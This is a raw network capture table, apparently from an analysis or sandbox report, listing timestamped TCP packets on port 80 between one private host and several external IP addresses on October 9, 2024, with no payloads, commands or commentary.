                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.023705006 CEST8049742103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.023767948 CEST8049742103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.023816109 CEST8049742103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.023996115 CEST4974280192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:02.986496925 CEST4974280192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:04.003946066 CEST4974380192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:04.412071943 CEST8049743103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:04.412395000 CEST4974380192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:04.420373917 CEST4974380192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:04.784869909 CEST8049743103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:04.784961939 CEST8049743103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:04.785060883 CEST8049743103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:04.785384893 CEST8049743103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:04.785473108 CEST8049743103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:05.090292931 CEST8049743103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.875128031 CEST4975280192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.875296116 CEST4975280192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.969098091 CEST8049752172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.969213009 CEST8049752172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.969223976 CEST8049752172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.969348907 CEST8049752172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.969358921 CEST8049752172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.969367981 CEST8049752172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.983220100 CEST8049752172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.983345032 CEST8049752172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.983355999 CEST8049752172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.983529091 CEST4975280192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.984000921 CEST8049752172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:12.984222889 CEST4975280192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:14.379738092 CEST4975280192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.399468899 CEST4975380192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.494075060 CEST8049753172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.494287968 CEST4975380192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.499568939 CEST4975380192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.593913078 CEST8049753172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.610013962 CEST8049753172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.610105991 CEST8049753172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.610236883 CEST8049753172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.610241890 CEST4975380192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.610250950 CEST8049753172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.610261917 CEST8049753172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.610315084 CEST8049753172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.610323906 CEST8049753172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.610502005 CEST4975380192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.610502005 CEST4975380192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.613859892 CEST4975380192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:15.708091974 CEST8049753172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:20.737404108 CEST4975480192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:20.831650972 CEST8049754104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:20.831842899 CEST4975480192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:20.839765072 CEST4975480192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:20.934262991 CEST8049754104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:21.259969950 CEST8049754104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:21.260082006 CEST8049754104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:21.260133982 CEST8049754104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:21.260232925 CEST4975480192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:21.260356903 CEST4975480192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:22.346676111 CEST4975480192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:23.364257097 CEST4975580192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:23.458642006 CEST8049755104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:23.458873987 CEST4975580192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:23.467556000 CEST4975580192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:23.562014103 CEST8049755104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:23.711045027 CEST8049755104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:23.711055994 CEST8049755104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:23.711247921 CEST4975580192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:23.711656094 CEST8049755104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:23.711806059 CEST4975580192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:24.971103907 CEST4975580192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:25.988682985 CEST4975680192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.083416939 CEST8049756104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.083636999 CEST4975680192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.092662096 CEST4975680192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.092710018 CEST4975680192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.092760086 CEST4975680192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.187529087 CEST8049756104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.187541962 CEST8049756104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.187551975 CEST8049756104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.187560081 CEST8049756104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.187567949 CEST8049756104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.187741041 CEST8049756104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.187753916 CEST8049756104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.963123083 CEST8049756104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.963135958 CEST8049756104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.963149071 CEST8049756104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.963311911 CEST4975680192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:27.595546007 CEST4975680192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:28.613065004 CEST4975780192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:28.707717896 CEST8049757104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:28.707918882 CEST4975780192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:28.713229895 CEST4975780192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:28.807821035 CEST8049757104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:29.488059044 CEST8049757104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:29.488219023 CEST8049757104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:29.488234997 CEST8049757104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:29.488401890 CEST4975780192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:29.491774082 CEST4975780192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:29.586417913 CEST8049757104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.627223969 CEST4975880192.168.11.20203.161.46.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.788378000 CEST8049758203.161.46.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:50.653062105 CEST4976280192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:51.670658112 CEST4976380192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:51.764844894 CEST804976323.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:51.765081882 CEST4976380192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:51.773004055 CEST4976380192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:51.867413044 CEST804976323.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:52.415227890 CEST804976323.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:52.415242910 CEST804976323.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:52.415321112 CEST804976323.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:52.415334940 CEST804976323.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:52.415426016 CEST4976380192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:52.415431023 CEST804976323.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:52.415497065 CEST4976380192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:52.415601015 CEST4976380192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:53.277448893 CEST4976380192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.295139074 CEST4976480192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.390813112 CEST804976423.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.391046047 CEST4976480192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.398884058 CEST4976480192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.398936033 CEST4976480192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.398982048 CEST4976480192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.495729923 CEST804976423.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.495742083 CEST804976423.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.495753050 CEST804976423.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.495762110 CEST804976423.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.689748049 CEST804976423.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.689855099 CEST804976423.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.689883947 CEST804976423.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.689897060 CEST804976423.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.689913034 CEST804976423.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.690080881 CEST4976480192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.690902948 CEST804976423.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:54.691008091 CEST4976480192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:55.901957035 CEST4976480192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:56.919455051 CEST4976580192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:57.019773960 CEST804976523.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:57.019982100 CEST4976580192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:57.025243998 CEST4976580192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:57.120136976 CEST804976523.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:57.190778971 CEST804976523.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:57.190790892 CEST804976523.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:57.190805912 CEST804976523.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:57.191061020 CEST4976580192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:57.193063021 CEST4976580192.168.11.2023.227.38.74
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:57.287880898 CEST804976523.227.38.74192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:02.306124926 CEST4976680192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:02.600881100 CEST8049766154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:02.601074934 CEST4976680192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:02.609004974 CEST4976680192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:02.903904915 CEST8049766154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:02.904079914 CEST8049766154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:02.904333115 CEST4976680192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:04.118863106 CEST4976680192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:05.136420965 CEST4976780192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:05.431372881 CEST8049767154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:05.431696892 CEST4976780192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:05.442235947 CEST4976780192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:05.737257957 CEST8049767154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:05.737360954 CEST8049767154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:05.737552881 CEST4976780192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:06.946367979 CEST4976780192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:07.963897943 CEST4976880192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:08.258749008 CEST8049768154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:08.259082079 CEST4976880192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:08.267095089 CEST4976880192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:08.267163038 CEST4976880192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:08.562304974 CEST8049768154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:08.562395096 CEST8049768154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:08.562711000 CEST8049768154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:08.562880039 CEST8049768154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:08.563009024 CEST8049768154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:08.563169003 CEST4976880192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:09.773881912 CEST4976880192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:10.791445971 CEST4976980192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:11.086296082 CEST8049769154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:11.086540937 CEST4976980192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:11.092348099 CEST4976980192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:11.387262106 CEST8049769154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:11.387381077 CEST8049769154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:11.387667894 CEST4976980192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:11.389655113 CEST4976980192.168.11.20154.23.184.207
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:11.684551954 CEST8049769154.23.184.207192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:16.503571987 CEST4977080192.168.11.20185.230.15.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:16.728497028 CEST8049770185.230.15.3192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:16.728743076 CEST4977080192.168.11.20185.230.15.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:16.736579895 CEST4977080192.168.11.20185.230.15.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:49.650146961 CEST4978080192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:49.658235073 CEST4978080192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:49.658308983 CEST4978080192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:49.869158030 CEST804978085.159.66.93192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:49.869323969 CEST804978085.159.66.93192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:51.171127081 CEST4978080192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:51.422194004 CEST804978085.159.66.93192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:52.189063072 CEST4978180192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:52.400229931 CEST804978185.159.66.93192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:52.400445938 CEST4978180192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:52.406431913 CEST4978180192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:52.620397091 CEST804978185.159.66.93192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:52.620735884 CEST4978180192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:52.622709990 CEST4978180192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:52.833431005 CEST804978185.159.66.93192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:57.981786966 CEST4978280192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:58.107831001 CEST8049782176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:58.108103991 CEST4978280192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:58.115968943 CEST4978280192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:58.241934061 CEST8049782176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:58.385385990 CEST8049782176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:58.385426044 CEST8049782176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:58.385647058 CEST4978280192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:59.622417927 CEST4978280192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:00.639991999 CEST4978380192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:00.766917944 CEST8049783176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:00.767126083 CEST4978380192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:00.775222063 CEST4978380192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:00.902276993 CEST8049783176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:01.048105001 CEST8049783176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:01.048118114 CEST8049783176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:01.048255920 CEST4978380192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:02.278064013 CEST4978380192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:03.295643091 CEST4978480192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:03.422012091 CEST8049784176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:03.422174931 CEST4978480192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:03.430509090 CEST4978480192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:03.430572987 CEST4978480192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:03.556350946 CEST8049784176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:03.557254076 CEST8049784176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:03.694143057 CEST8049784176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:03.694169044 CEST8049784176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:03.694348097 CEST4978480192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:04.933696032 CEST4978480192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:05.951311111 CEST4978580192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:06.079746008 CEST8049785176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:06.079936981 CEST4978580192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:06.085262060 CEST4978580192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:06.212316036 CEST8049785176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:06.348920107 CEST8049785176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:06.348932028 CEST8049785176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:06.349059105 CEST8049785176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:06.349276066 CEST4978580192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:06.351234913 CEST4978580192.168.11.20176.57.64.102
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:06.478288889 CEST8049785176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:41.536225080 CEST4979480192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:41.630954981 CEST8049794199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:41.631185055 CEST4979480192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:41.636502981 CEST4979480192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:41.730819941 CEST8049794199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:41.739375114 CEST8049794199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:41.739388943 CEST8049794199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:41.739402056 CEST8049794199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:41.739764929 CEST4979480192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:41.741730928 CEST4979480192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:41.744728088 CEST8049794199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:41.744993925 CEST4979480192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:41.836391926 CEST8049794199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:46.755183935 CEST4979580192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:47.768095970 CEST4979580192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:48.133245945 CEST8049795103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:48.133508921 CEST4979580192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:48.138307095 CEST8049795103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:48.138484955 CEST4979580192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:48.141407013 CEST4979580192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:48.508451939 CEST8049795103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:48.716856956 CEST8049795103.247.8.53192.168.11.20
